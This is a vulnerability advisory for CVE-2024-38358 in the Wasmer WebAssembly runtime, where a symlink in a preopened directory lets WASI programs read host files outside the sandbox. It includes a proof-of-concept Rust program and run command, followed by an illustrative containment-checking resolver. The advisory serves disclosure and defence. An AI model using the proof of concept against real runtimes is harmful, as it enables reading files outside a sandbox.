CVE-2024-38358 wasmer

Package

Manager: cargo
Name: wasmer
Vulnerable Version: >=0 <=4.3.1

Severity

Level: Low

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00104 (percentile 0.29086)

Details

Symlink bypasses filesystem sandbox

### Summary

If the preopened directory contains a symlink pointing outside it, WASI programs can traverse the symlink and access the host filesystem when the caller sets both `oflags::creat` and `rights::fd_write`. Programs can also crash the runtime by creating a symlink pointing outside with `path_symlink` and then `path_open`ing the link.

### Details

### PoC

Set up a filesystem as follows:

```
.
├── outside.file
└── preopen
    └── dir
        └── file -> ../../outside.file
```

Compile this Rust snippet with `wasi` v0.11 (for the preview1 API):

```rust
fn main() {
    unsafe {
        // Open the symlink through the preopened directory, asking the
        // runtime to follow it and to create the target if missing.
        let filefd = wasi::path_open(
            5,
            wasi::LOOKUPFLAGS_SYMLINK_FOLLOW,
            "app/dir/file",
            wasi::OFLAGS_CREAT,
            wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE,
            0,
            0,
        )
        .unwrap();
        eprintln!("filefd: {filefd}");

        // Read back whatever the descriptor refers to.
        let mut buf = [0u8; 10];
        let iovs = [wasi::Iovec {
            buf: buf.as_mut_ptr(),
            buf_len: buf.len(),
        }];
        let read = wasi::fd_read(filefd, &iovs).unwrap();
        eprintln!("read {read}: {}", String::from_utf8_lossy(&buf));
    }
}
```

Run the compiled binary with Wasmer preopening `preopen/`:

```
wasmer run --mapdir /app:preopen a.wasm
```

This should not print the contents of `outside.file`. Other runtimes such as Wasmtime block this call, but Wasmer prints the contents of the file.
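The root cause described above is that a symlink encountered during `path_open` is followed without checking where it leads. The fix a sandbox needs is to resolve the guest path one component at a time and to re-check containment after every symlink hop, so that a link target such as `../../outside.file` is refused before the host filesystem is touched, and a dangling link is handled without crashing. The following is an added example illustrating that resolution strategy; it is not Wasmer's code and has no knowledge of Wasmer's internals. The function name `resolve_in_sandbox`, the `build_fixture` helper and the temporary directory layout are constructed for this illustration (the layout mirrors the PoC tree, with an extra in-sandbox link `dir/inner -> ../ok.txt` to show the allowed case). It runs on Unix-like hosts because it creates symlinks.

```rust
use std::collections::VecDeque;
use std::ffi::OsString;
use std::fs;
use std::io;
use std::os::unix::fs::symlink;
use std::path::{Path, PathBuf};

// Added example, not Wasmer's code: a component-wise resolver that keeps
// symlink resolution inside a preopened directory. Names are invented.

const MAX_SYMLINK_HOPS: usize = 40;

fn deny(msg: &str) -> io::Error {
    io::Error::new(io::ErrorKind::PermissionDenied, msg)
}

/// Resolve `guest_path` beneath the preopened `root`, following symlinks one
/// component at a time. Every intermediate location, including each symlink
/// target, must stay inside `root`; otherwise the lookup fails with
/// `PermissionDenied` before any host file is opened. A missing final
/// component is allowed so the caller can still honour `oflags::creat`.
pub fn resolve_in_sandbox(root: &Path, guest_path: &str) -> io::Result<PathBuf> {
    let root = fs::canonicalize(root)?;
    let mut current = root.clone();
    let mut pending: VecDeque<OsString> = Path::new(guest_path)
        .components()
        .map(|c| c.as_os_str().to_os_string())
        .collect();
    let mut hops = 0usize;

    while let Some(comp) = pending.pop_front() {
        if comp == "." {
            continue;
        } else if comp == ".." {
            current.pop();
        } else if comp == "/" {
            return Err(deny("absolute guest path"));
        } else {
            current.push(&comp);
        }
        // Containment is checked after every step, so a `..` typed by the
        // guest and a `..` spliced in from a symlink target are caught alike.
        if !current.starts_with(&root) {
            return Err(deny("path escapes sandbox"));
        }
        match fs::symlink_metadata(&current) {
            Ok(meta) if meta.file_type().is_symlink() => {
                hops += 1;
                if hops > MAX_SYMLINK_HOPS {
                    return Err(io::Error::new(io::ErrorKind::Other, "too many symlink hops"));
                }
                let target = fs::read_link(&current)?;
                if target.is_absolute() {
                    // Conservative policy: an absolute link target names a host path.
                    return Err(deny("absolute symlink target"));
                }
                // The target is relative to the link's parent directory: drop the
                // link itself and queue the target's components to walk next.
                current.pop();
                for c in target.components().rev() {
                    pending.push_front(c.as_os_str().to_os_string());
                }
            }
            Ok(_) => {}
            // A dangling final component is fine (the caller may create it).
            Err(e) if e.kind() == io::ErrorKind::NotFound && pending.is_empty() => {}
            Err(e) => return Err(e),
        }
    }
    Ok(current)
}

/// Constructed fixture mirroring the PoC tree, created under a fresh temp dir:
///   base/outside.file
///   base/preopen/ok.txt
///   base/preopen/dir/file  -> ../../outside.file   (escapes the preopen)
///   base/preopen/dir/inner -> ../ok.txt            (stays inside)
/// Returns the path of the preopened directory.
pub fn build_fixture(tag: &str) -> io::Result<PathBuf> {
    let base = std::env::temp_dir().join(format!("sandbox-demo-{}-{}", std::process::id(), tag));
    let _ = fs::remove_dir_all(&base);
    fs::create_dir_all(base.join("preopen/dir"))?;
    fs::write(base.join("outside.file"), b"host data\n")?;
    fs::write(base.join("preopen/ok.txt"), b"inside\n")?;
    symlink("../../outside.file", base.join("preopen/dir/file"))?;
    symlink("../ok.txt", base.join("preopen/dir/inner"))?;
    Ok(base.join("preopen"))
}

fn main() -> io::Result<()> {
    let preopen = build_fixture("main")?;
    for guest in ["dir/inner", "dir/file", "dir/newfile", "../outside.file"] {
        match resolve_in_sandbox(&preopen, guest) {
            Ok(p) => println!("{guest:<16} -> allowed: {}", p.display()),
            Err(e) => println!("{guest:<16} -> refused: {e}"),
        }
    }
    Ok(())
}
```

The design point is that `fs::canonicalize` on the final path alone is not enough for a sandbox: it fails on a dangling link (the crash case in the summary) and says nothing about intermediate hops. Walking component by component with a hop limit gives the runtime a decision at each step, which is where a `path_open` with `oflags::creat` must be refused.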

Metadata

Created: 2024-06-07T19:40:00Z
Modified: 2024-06-20T14:14:38Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-55f3-3qvg-8pv5/GHSA-55f3-3qvg-8pv5.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-55f3-3qvg-8pv5
Finding: F063
Auto approve: 1